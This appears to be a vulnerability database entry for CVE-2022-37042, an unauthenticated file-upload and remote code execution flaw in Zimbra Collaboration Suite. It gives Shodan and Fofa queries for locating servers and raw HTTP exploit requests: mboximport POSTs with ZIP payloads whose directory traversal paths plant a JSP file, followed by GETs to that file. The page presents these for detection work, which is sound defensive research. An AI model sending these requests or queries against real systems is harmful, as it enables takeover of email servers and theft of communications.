🔙 목록으로 돌아가기

CVE-2022-37042: Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution

TitleZimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution
Author_0xf4n9x_,For3stCo1d
SeverityCritical
ImpactUnauthenticated attackers can bypass authentication and upload arbitrary files through the mboximport functionality, achieving directory traversal and remote code execution on Zimbra Collaboration Suite servers, potentially compromising email systems and sensitive communications.
RemediationApply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite.
CVSS Score9.8
EPSS Score0.94333
CVE IDCVE-2022-37042
CWE IDCWE-22
Shodan Queryhttp.favicon.hash:"1624375939"http.favicon.hash:"475145467"
Fofa Queryapp="zimbra-邮件系统"icon_hash="475145467"icon_hash="1624375939"
Tags cve cve2022 zimbra rce unauth kev vkev vuln

🔍 Vulnerability Description

Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.

🌐 HTTP Request

GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.5
Accept-Encoding: gzip
Connection: close
GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept-Encoding: gzip
Connection: close
POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 716
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Connection: close

PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ
�0�OQ�!(�U\�[�;�t;�CS�$�K��E�oUd.���X&+�i���;�m��>D>�E�z��?�Ի��Pef�O�@���P��d`㬾"���ɀψ/�Y�!�RzDBF�ʬX��PK?�]��PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ
�0�OQ�!(�U\�[�;�t;�CS�$�K��E�oUd.���X&+�i���;�m��>D>�E�z��?�Ի��Pef�O�@���P��d`㬾"���ɀψ/�Y�!�RzDBF�ʬX��PK?�]��PK?�]��=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?�]��=�../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK��
POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Content-Length: 716
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Connection: close

PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ
�0�OQ�!(�U\�[�;�t;�CS�$�K��E�oUd.���X&+�i���;�m��>D>�E�z��?�Ի��Pef�O�@���P��d`㬾"���ɀψ/�Y�!�RzDBF�ʬX��PK?�]��PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ
�0�OQ�!(�U\�[�;�t;�CS�$�K��E�oUd.���X&+�i���;�m��>D>�E�z��?�Ի��Pef�O�@���P��d`㬾"���ɀψ/�Y�!�RzDBF�ʬX��PK?�]��PK?�]��=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?�]��=�../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK��

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-37042.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-37042.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A